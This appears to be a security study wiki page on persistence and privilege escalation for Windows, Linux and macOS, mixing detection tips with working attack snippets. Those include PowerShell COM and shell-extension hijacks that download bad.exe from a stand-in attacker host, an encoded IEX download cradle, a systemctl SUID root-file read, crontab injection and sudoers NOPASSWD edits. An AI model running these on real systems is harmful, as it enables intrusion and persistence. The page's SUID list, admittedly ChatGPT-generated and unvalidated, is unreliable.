This is about … .
🔖
.014
Active Setup (Not yet processed)
Startup
Windows
The list of reg keys that could be abused for persistence and escalation:
the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
(default)
- all users is
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
(default) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
(default)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
(default)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(default)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
(default)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(when specified in the policy settings)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(when specified in the policy settings)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
run when any user logs on.- multistring
BootExecute
value of the registry keyHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
is set toautocheck autochk *
. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. - Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of"Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded. - Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\
. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. - Registry entries in
HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\
andHKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
are used to manage additional helper programs and functionalities that support Winlogon.Winlogon\Notify
- points to notification package DLLs that handle Winlogon eventsWinlogon\Userinit
- points to userinit.exe, the user initialization program executed when a user logs onWinlogon\Shell
- points to explorer.exe, the system shell executed when a user logs on
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
,HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages
- load into LSA space, meaning having access to unencrypted password info.
📘 BTFM
autorunsc -v [options] > result.csv
Linux
/etc/systemd/system
/usr/lib/systemd/system
/etc/init*
macOS
Login Items
System Preferences -> Users & Groups -> Login Items
. Additional: SDF podcast.
How to determine if it’s malicious? Well, the sure way is only to reverse engineer it, but it is time consuming. So, you need to narrow down the candidates first. There are a couple of indicators that are commonly seen in malware.
Login items run within the user’s desktop session, inheriting the user’s permissions, and start automatically at user login. Due to this afforded persistence, Mac malware will commonly install itself as a login item. You can find examples of this technique in malware like Kitm, NetWire, and WindTail. Wardle, Patrick. The Art of Mac Malware (p. 24). No Starch Press. Kindle Edition.
❗️ macOS doesn’t readily show the full path to a persisted login item in its interface (unless you hover over the item for a few seconds)
👻 backgroundtaskmanagementagent
is a daemon that is running in the background and thus also manages login items. The list of the items is stored in a file ⚙️ named backgrounditems.btm
.
Programming persistence
⚙️ LSSharedFileListCreate
(returns the reference to the list) -> LSSharedFileListInsertItemURL
(adds a new item, requires a full path to the item).
To view the APIs used run nm WindTail/Final_Presentation.app/Contents/MacOS/usrnode
. Seeing the above two APIs in the list suggest this persistence mechanism was used by the binary.
🥷🏼 (stealthy) SMLoginItemSetEnabled
- the “Modern Login Items” blog post or Apple’s documentation on the topic. This allows application-specific helper login items. They don’t show up in the Preferences. Those items are stored in LoginItems
subdirectory of an application’s bundle.
Boot
Windows
Flashing BIOS
Update BIOS with the malicious code included. More here.
Boot execute
Not sure what that means https://www.tenable.com/plugins/nessus/70615. Could be this:
🔑
HKLM\System\CurrentControlSet\Control\ServiceControlManagerExtension
🔑HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
🔑HKLM\System\CurrentControlSet\Control\Session Manager\Execute
🔑HKLM\System\CurrentControlSet\Control\Session Manager\S0InitialCommand
🔑HKLM\System\CurrentControlSet\Control\Session Manager\SetupExecute
Services
Windows
🔑 HKLM\SYSTEM\CurrentControlSet\Services
. The executable needs to have certain code and permissions for service behaviour, and there are three options to accomplish that:
- New service. If
Start
value =0x2
(see 🔑 above), start the service at boot. Example 🦠: APT1, RIP listener service. ⚒️sc [queryex|qc|qprivs|qtriggerinfo]
. - Hijacking, aka Replacement. Required modifications to some existing services. Usually, some rarely used one. Example 🦠: GlassRAT.
- Service failure recovery. Load something 🦠bad when something good and service-like 👼 crashes. You can define what to do if a certain service crashes; usually it’s restarting the service. However, this setting can be changed to launch another executable. ⚒️ Kansa Powershell Framework (
Get_SvcFail.ps1
script), event logs.
Kansa has several scripts to stack services. You can also use the general one:
.\Get-LogparserStack.ps1 -FilePattern *SvcAll.csv -Delimiter "," -Direction asc -OutFile SvcAll-workstation-stack.csv
To do the same job with PowerShell:
$csvFiles = Get-ChildItem -Path ".\*SvcAll.csv"
$result = @()
foreach ($csvFile in $csvFiles) {
$data = Import-Csv -Path $csvFile.FullName
$result += $data
}
$result[0] | Get-Member -MemberType NoteProperty | Select-Object Name
$groupedData = $result | Group-Object -Property Name, PathName | Select-Object Count, Name, PathName, @{Name="PC"; Expression={$_.Group.'PSComputerName'}}
$groupedData | Export-Csv -Path "result.csv" -NoTypeInformation
Linux
Unused services. To disable a service:
sudo systemctl stop <servicename>
sudo systemctl disable <servicename>
macOS
⚙️ The most relevant keys in a plist would be the following:
- Label
- Arguments
- RunAtLoad - persistence.
- PathState (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
- StartCalendarInterval (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
👻 launchd
process is responsible for running these items. 📚 Reference: A Launch tutorial, https://www.launchd.info/; “Getting Started with Launchd for Sys Admins,” Penn State MacAdmins Conference 2012, https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf.
An example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC ...>
<plist version="1.0"><dict>
<key>Label</key>
<string>com.foo.bar</string>
<key>ProgramArguments</key>
<array>
<string>/Users/user/launchItem</string>
<string>argument 1</string>
<string>argument 2</string>
</array>
<key>RunAtLoad</key>
1 <true/>
</dict>
</plist>
Wardle, Patrick. The Art of Mac Malware (p. 27). No Starch Press. Kindle Edition.
Agents
Run once the user is logged in. Do not have root permissions. They may interract with the user session.
The plists can be found here:
/Library/LaunchAgents
~/Library/LaunchAgents
# to read the file run
plutil -p <path to plist>
defaults read <path to plist>
Daemons
They usually run before the user logs in. Do not require user interaction. They run with 👑 root permissions.
The plists can be found here:
/Library/LaunchDaemons
# to read the file run
plutil -p <path to plist>
defaults read <path to plist>
## Libs
### Windows
For some of the injection techniques (low-level ones), see the [injections](/docs/reverse/malware-analysis/injections) article.
#### DLL Sideloading
Following is the search order for modern Windows systems:
1. Manifest (if the application provides an absolute path to the `dll`)
2. Search the RAM for the same module. No searching.
3. Dlls in the same direction as the executable that loads it
4. `KnowDLLs` list `HKLM\SYSTEM\CurrentControlSet\Control\WOW` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs` ([docs](KnowDLLs` list `HKLM\SYSTEM\CurrentControlSet\Control\WOW`)). So, if the dll is in the list, the link from the registry is used, and there is no search conducted.
6. Application's loading directory
7. `C:\Windows\System32`
8. `C:\Windows\system`
9. `C:\Windows`
10. Application's registered App Paths directories ❓
11. `PATH` env variable
> ❗️ If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path. [[1](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)] So, that means that we can make a side-loading attack on "a side-loaded `dll`"!
> ❓Not sure about the different paths specified for the KnowDlls entries. This might be due to the different OS versions. See [here](http://stuff.is-a-geek.net/OnlineDocs/Microsoft/NTmisc/Troubleshooting%20NTVDM%20and%20WOW%20startup%20problems.htm):
>
> For 16-bit apps, Windows NT uses KnownDLLs to implicitly and explicitly load DLLs. The value is at `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WOW`. At this key, `KnownDLLs` is a type `REG_SZ` value which lists the 8.3 DLL names, separated by spaces. Without a `KnownDLLs` entry, `WOW` searches:
> 1. The current directory.
> 2. The `%SystemRoot%` directory.
> 3. The `%SystemRoot%\SYSTEM` directory.
> 4. The `%SystemRoot%\SYSTEM32` directory.
> 5. The `.exe` file directory.
> 6. The directories in your `Path` environment variable.
With the KnownDLLs entry, WOW only searches the %SystemRoot%\SYSTEM32 directory.
The order depends also on the `SafeDllSearchMode` (🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode`). Here is the quote from the [docs](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications):
>If **SafeDllSearchMode** is enabled ✅, the search order is as follows:
>1. The directory from which the application loaded.
>2. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
>3. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
>4. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
**>5. The current directory.**
>6. The directories are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
>
> If **SafeDllSearchMode** is disabled ⛔️, the search order is as follows:
> 1. The directory from which the application loaded.
**> 2. The current directory.**
> 3. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
> 4. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
> 5. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
Side-by-side loading (SxS) mechanism to introduce updated versions of DLL. It can be used to circumvent anti-virus. Example: PlugX RAT. Legitimately signed `exe` uses SxS to load a malicious `dll`. The attacker puts a nefarious `dll` somewhere down the road to make sure it's loaded instead of the legitimate one.
📚 **References**: Read more [here](https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading).
#### Phantom DLL hijacking
An executable is trying to load a very old `dll`, even though it's superfluous. Some of them don't even exist anymore, for example, `fxsst.dll`. The attacker just creates a dll with the same name and some nefarious functionality.
### macOS
#### Dylibs Environment Variables
```bash
DYLD_*
DYLD_INSERT_LIBRARIES # all libs from this env will be loaded
DYLD_FRAMEWORK_PATH
These libraries are loaded within a trusted host process, not resulting in a new process.
A plist
for launch item - EnvironmentVariables
. For application - LSEnvironment
(Info.plist
).
Proxying
Hijacking
Tasks
Windows
C: \Windows\ Tasks\ \*.job
C: \Windows\SchedLgU.txt
C: \Windows\system32\Tasks
at.exe
(deprecated but can still be used) and schtasks.exe
. For at
see at*.job
and Schdlgu.txt
and Task Scheduler and Security Logs for the second one. WinXP: at jobs run with SYSTEM privileges. Files are created here: \Windows\Tasks
and \Windows\System32\Tasks
(xml duplicate Win7+). Created with: at.exe 22:22:22 C:\mal.exe
or schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe
.
📕 RTFM
An attempt to be stealthy.
powershell -W Hidden -nop -noni -ec <base64somthing> # The output of this command won't show a PowerShell window and the output as well. The script to execute is base64 encoded.
# W WindowStyle = Hidden
# nop NoProfile Does not load PS profile
# noni NonINteractive - no interactive prompt to the user presented
# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')
Linux
/etc/cron*
/var/spool/crontabs
/var/spool/atjobs
/etc/anacron
macOS
Cron
/usr/bin/crontab
Post-exploitation RT tool EmPyre has a module to exploit this technique.
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
The cat
and echo
commands append the new command. The %s
in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * *
component instructs macOS to execute the job every hour.
The crontab -
will reinstall any existing jobs, along with the new one.
At
/private/var/at/jobs/
directory and enumerate them via the /usr/bin/atq
utility.
❗️ On a default install of macOS, the
at
scheduler,/usr/libexec/atrun
, is disabled. However, malware can enable it with 👑 root privileges with the following command:launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
.
After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.
Not a popular technique.
Periodic
/etc/periodic
Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. “What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/
Login and Logout Hooks
Look for either LoginHook or LogoutHook in the following plist:
~/Library/Preferences/com.apple.loginwindow.plist
📕 RTFM
#!/bin/bash
export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token) export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/ document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*
Policies
Windows
More about it here. This could be used to allow some legit software.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(when specified in the policy settings)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(when specified in the policy settings)
Office
📚 References: More here.
IPC
Windows
Shell Extension Handlers
Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers
. Same under HKLM
. ⚠️ No need to provide admin creds to add a value here, to HKCU
only. GUID here is the same as listed in CLSID
subkey. To add a malicious extension one needs to create a unique GUID, add a subkey to CLSID, add
a path to dll
, and then add a shell extension in the registry above using the same GUID. Use 🛠 OLE/COM object Viewer to see all COM objects registered. Simply clicking an image or a archive file may trigger a malicious act.
$Path="HKCU:\Software\Classes\*\shellex\ContectMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"
New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
COM Hijack
In Process Monitor filter: Path contains CLSID and Result is NAME NOT FOUND. The entry exists in HKLM\Software\Classes\CLSID\{GUID}
, but doesn’t exist at HKCU\Software\Classes\CLSID\{GUID}
. It looks for the entry in HKCU first, if not found, in HKLM. That’s where we can add an entry under HKCU. Powershell needs to be used, since it’s a trusted application for registry.
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
Extension Handler Hijacking
Computer\HKCR\
, subkeys Open
and Command
. An attackere can’t change HKCR or HKLM, but can change HKCU
and HKU
without admin privileges. Using a proxy within Command
will help remain low: proxy.exe "{path/to/real/app}"
(starts the meterpreter, for example, then launches the real appliation). ⚠️ Powershell is not necessary, HKU hive can be edited without it.
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\\tmp\\bad.exe"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.
Elevation Control Mechanism Abuse
Linux & macOS
setuid
and setgid
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/
setuid
or setgid
bits set in UNIX. chmod u+s [file]
or chmod 4777 [file]
to set the bit. To enable the setgid bit, chmod 2775
and chmod g+s
can be used. Look for the files with the bit set: find / -perm +4000 2>/dev/null
and find / -perm +2000 2>/dev/null
for the segid
.
When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.
One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server: sudo systemctl start apache2
. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.
eop=$(mktemp).service # create a temp file with a random unique name and store the name in a eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop # write the config for the service into the file. This unit file will be used by the systemctl to run the process specified in the ExecStart variable.
# ❗️ Do not copy this code in whole, line by line without the > sign, or else you will not get it work
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)
/bin/systemctl link $eop # This command in Linux creates a symbolic link for the service file specified in the "$eop" environment variable, in the "/etc/systemd/system/" directory, using the systemctl utility. The link created allows the service to be managed with systemctl commands.
/bin/systemctl enable --now $eop # This command in Linux enables and starts the service specified in the "$eop" environment variable, using the systemctl utility. The "enable" option makes the service to start at boot time, while the "--now" option starts the service immediately after the command is executed.
Below is the list generated by ChatGTP (to validate) that shows other executables with this bit set that are potentially useful to the attacker:
/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.
Sudo caching
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/
One can add admin ALL=(ALL) NOPASSWD: ALL
to the /etc/sudoers
file.
Also, malware might monitor /var/db/sudo
file for the timestamp and execurte when possible.
Also, it’s possible to disable terminal windows isolation, like this: echo \'Defaults !tty_tickets\' >> /etc/sudoers
.
AuthorizationExecuteWithPrivileges
Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/
AuthorizationExecuteWithPrivileges
API (macOS). Set the preferences to block all programs not downloaded from AppStore. Basically, it brings a prompt and asks the user to grant the permissions. The trick is to be convincing enought so that the user grants the permissions.
Mitigations: least privilege, proper configuration, defense in-depth, zero trust.
Writeups 📚:
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
- https://n0w4n.nl/vulnversity/
Windows
UAC Abuse
Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/
Abusing UAC on Windows.
Tokens
MITRE: https://attack.mitre.org/techniques/T1134/001/, https://attack.mitre.org/techniques/T1134/, https://attack.mitre.org/techniques/T1134/002/, https://attack.mitre.org/techniques/T1134/003/, https://attack.mitre.org/techniques/T1134/004/, https://attack.mitre.org/techniques/T1134/005/ Actors: https://attack.mitre.org/groups/G0032/
Techniques:
- Token impersonalisation.
runas
orCreateProcessWithTokenW
to create a process with the rights of another user.- spoof parent process ID
- Windows. SID-history injection. By injecting a fake SID into the SID history of a user account, an attacker can create a new identity with additional access rights without raising any alarms. 🚨 Need elevated privileges. The SID history is stored in the user object’s attribute in the AD database. The attribute is named “SIDHistory” and can be viewed and modified using the Active Directory Users and Computers (ADUC) management console or other AD management tools.
Kernel Modules and Extentions
Linux
LKM
LKM for Linux. Drivers are one type of kernel extentions.
XDG
https://attack.mitre.org/techniques/T1547/013/
macOS
kext
kext
for macOS. kextload
and kextunload
. These need to be signed with a cert approved by Apple. Otherwise, to launch the app one needs to disable SIP. That’s probably the reason why the RAM cannot be dumped on macOS with SIP enabled. Replaced by System Extentions but still can be used.
reopen
Remember the “Reopen windows when logging back in” prompt on macOS? When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory. Applications listed in this file are automatically reopened upon the user’s next logon.
Windows
LSASS driver
Shortcuts
Abuse shortcuts in the startup folder to execute their tools and achieve persistence
Port Monitors
AddMonitor
API call.spoolsv.exe
runs under SYSTEM privileges.HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
(option #2)- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port
Print Processors
Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe (SYSTEM permissions, during boot.
AddPrintProcessor
for account withSeLoadDriverPrivilege
flag set.- adding the
HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver
Registry key that points to the DLL.
References
Expand…
macOS
Wardle, Patrick. The Art of Mac Malware
PEASS
Detect possible PE vectors on a W/L/M machine.